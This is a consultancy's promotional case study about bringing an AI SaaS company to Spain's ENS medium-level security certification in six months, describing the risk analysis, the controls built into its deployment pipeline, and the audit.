Hard2bit

Case study · SaaS · AI · Public sector

ENS medium level at an AI SaaS company

A Spanish SaaS company wanted to enter the public sector, and its first two tenders required conformity with the ENS — Spain's National Security Framework. Cloud-native platform, daily deployments and AI functionality inside the product. Six months later it was certified at medium level without slowing its release pace.

Sector

SaaS development · AI

Size

~40 employees

Framework

ENS · medium level

Infrastructure

Public cloud · containers

Duration

6 months to certification

Outcome

Certified · eligible to bid

The starting point

The team was technically mature — infrastructure as code, CI/CD with daily deployments, sound development practices — but the entire security governance lived in the CTO's head. No formal security policy, no risk analysis, no system categorisation. And one detail that complicated the file: the product included AI functionality processing customer information, something the certification body would examine closely.

The CTO's fear was the classic one tech companies have about the ENS: that bureaucracy would kill the team's velocity. The project was designed with that limit as a hard requirement — no control could break the continuous-deployment flow.

How we approached it

  1. Categorisation and profiling — analysis of the services to be provided to public administrations and of the information handled. The resulting category was medium, and we worked with the applicable compliance profile, avoiding oversized measures.
  2. Risk analysis and Statement of Applicability — a lightweight but traceable methodology aligned with how the company actually operates: cloud assets, the CI/CD pipeline, third-party dependencies, and the AI component treated as a distinct asset with risks of its own (training data, output traceability, model providers).
  3. Controls inside the pipeline, not on top of it — access control with MFA and quarterly reviews, signed and reviewed deployments, centralised logging with defined retention, encryption in transit and at rest, and vulnerability management wired into the development cycle. Evidence generates itself: the pipeline is the record.
  4. Documentation sized to the company — a documentation body that forty people can genuinely maintain: policy, usage rules, operating procedures and a continuity plan proven with a real recovery exercise.
  5. Certification audit — support throughout the audit with an accredited body, including defending the approach applied to the AI component. Certified at the first attempt.

Results

6 months

from first meeting to ENS medium-level certification

2

public tenders submitted in the same quarter as certification

0

deployments blocked by the ISMS: release pace untouched

Certification opened the door the company was after — bidding for public contracts — and produced a side effect nobody expected: two large private clients accelerated their supplier-onboarding processes on seeing the ENS seal and the security documentation already prepared.

What made it work

  • The ENS and continuous deployment are not at odds: if the control lives inside the pipeline, the evidence produces itself.
  • Treating AI as an asset with its own risks from the initial analysis avoided objections at audit.
  • Categorising properly at the start (medium, not high out of misplaced caution) saved months and unnecessary measures.

Related services

Need the ENS to bid for public contracts?

Hard2bit is ENS-certified at high level — we know the framework from the inside. We help you categorise correctly, implement just enough and arrive at the audit with evidence.